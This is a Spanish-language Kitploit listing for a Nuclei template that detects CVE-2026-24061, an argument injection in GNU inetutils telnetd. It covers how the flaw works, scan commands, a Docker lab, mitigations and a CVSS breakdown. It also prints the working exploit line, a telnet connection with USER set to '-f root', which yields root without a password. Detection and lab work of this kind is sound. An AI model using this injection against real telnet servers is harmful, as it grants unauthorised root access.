Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-24061 — Plantilla de Nuclei para detectar CVE-2026-24061, una inyección crítica de argumentos telnet en GNU inetutils telnetd que permite acceso root sin autenticación. | Kitploit
Herramientas/GitHubGitHub/mr-zapi/cve-2026-24061
Escáneres de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad de RedesPruebas de PenetraciónAprendizaje y Educación
GitHubmr-zapi/cve-2026-24061

CVE-2026-24061

Plantilla de Nuclei para detectar CVE-2026-24061, una inyección crítica de argumentos telnet en GNU inetutils telnetd que permite acceso root sin autenticación.

Ver Repositorio
1hace 7 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-24061 - Inyección de Argumentos en Telnet

Plantilla de Nuclei para la detección de la vulnerabilidad CVE-2026-24061 en GNU inetutils telnetd, que permite obtener acceso root sin autenticación.

📋 Descripción de la vulnerabilidad

CVE-2026-24061 es una vulnerabilidad crítica de inyección de argumentos en GNU inetutils telnetd, que permite a un atacante obtener una shell root sin conocer la contraseña.

¿Cómo funciona?

  1. Raíz del problema: En 2015, se añadió a telnetd un nuevo patrón de inicio de sesión con el parámetro dinámico %U:
root@kitploit:~
   /usr/bin/login -p -h %h %?u{-f %u}{%U}
  1. Vulnerabilidad: La variable de entorno USER se transmite a través del protocolo telnet (RFC 1572 NEW-ENVIRON) y no se sanitiza antes de sustituirse en el comando.

  2. Explotación: El atacante establece USER="-f root" al conectarse:

root@kitploit:~
   USER="-f root" telnet -a target.com 23
  1. Resultado: El comando de inicio de sesión se convierte en:
root@kitploit:~
   /usr/bin/login -p -h hostname -f root

El flag -f significa "omitir autenticación" → root sin contraseña 💀

🎯 Versiones afectadas

  • GNU inetutils telnetd con el patrón de inicio de sesión vulnerable
  • Por ejemplo: inetutils-telnetd 2:2.0-1+deb11u2
  • Sistemas donde telnetd utiliza auto-inicio de sesión sin Kerberos

🚀 Uso

Escaneo básico

root@kitploit:~
nuclei -t cve-2026-24061.yaml -u target.com:23 -code

Múltiples objetivos

root@kitploit:~
nuclei -t cve-2026-24061.yaml -l targets.txt -code

🔬 Laboratorio de pruebas

Para probar, se puede levantar un contenedor Docker vulnerable:

root@kitploit:~
FROM debian:11-slim

ENV DEBIAN_FRONTEND=noninteractive

RUN apt-get update && \
    apt-get install -y --no-install-recommends \
      inetutils-telnetd=2:2.0-1+deb11u2 \
      telnet && \
    rm -rf /var/lib/apt/lists/*

RUN useradd user1 && \
    sed -i 's/#<off># telnet/telnet/' /etc/inetd.conf

EXPOSE 23

CMD ["/usr/sbin/inetutils-inetd", "-d"]

Ejecución:

root@kitploit:~
# Construir la imagen
docker build -t vuln-telnetd .

# Ejecutar
docker run -d -p 2323:23 vuln-telnetd

# Verificar la vulnerabilidad
nuclei -t cve-2026-24061.yaml -u 127.0.0.1:2323 -code -v

🛡️ Protección

  1. Actualizar inetutils a la versión corregida
  2. Deshabilitar telnetd y usar SSH
  3. Filtrar el puerto 23 en el firewall
  4. Monitorear las conexiones a telnet

📚 Enlaces

  • NVD - CVE-2026-24061
  • SafeBreach Labs - Root Cause Analysis

📊 Puntuación CVSS

9.8 / 10 - Crítica

root@kitploit:~
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • AV:N - Red (ataque por red)
  • AC:L - Complejidad baja (fácil de explotar)
  • PR:N - Sin privilegios requeridos (no se necesita autenticación)
  • UI:N - Sin interacción del usuario (explotación automática)
  • C:H/I:H/A:H - Alto impacto en confidencialidad, integridad y disponibilidad

⚠️ Aviso legal

Esta herramienta está diseñada solo para pruebas de seguridad legales en sistemas sobre los que tenga permiso explícito.

El autor no se hace responsable del uso indebido de esta plantilla.

👤 Autor

Creado por Mr.Zapi

Descargar herramienta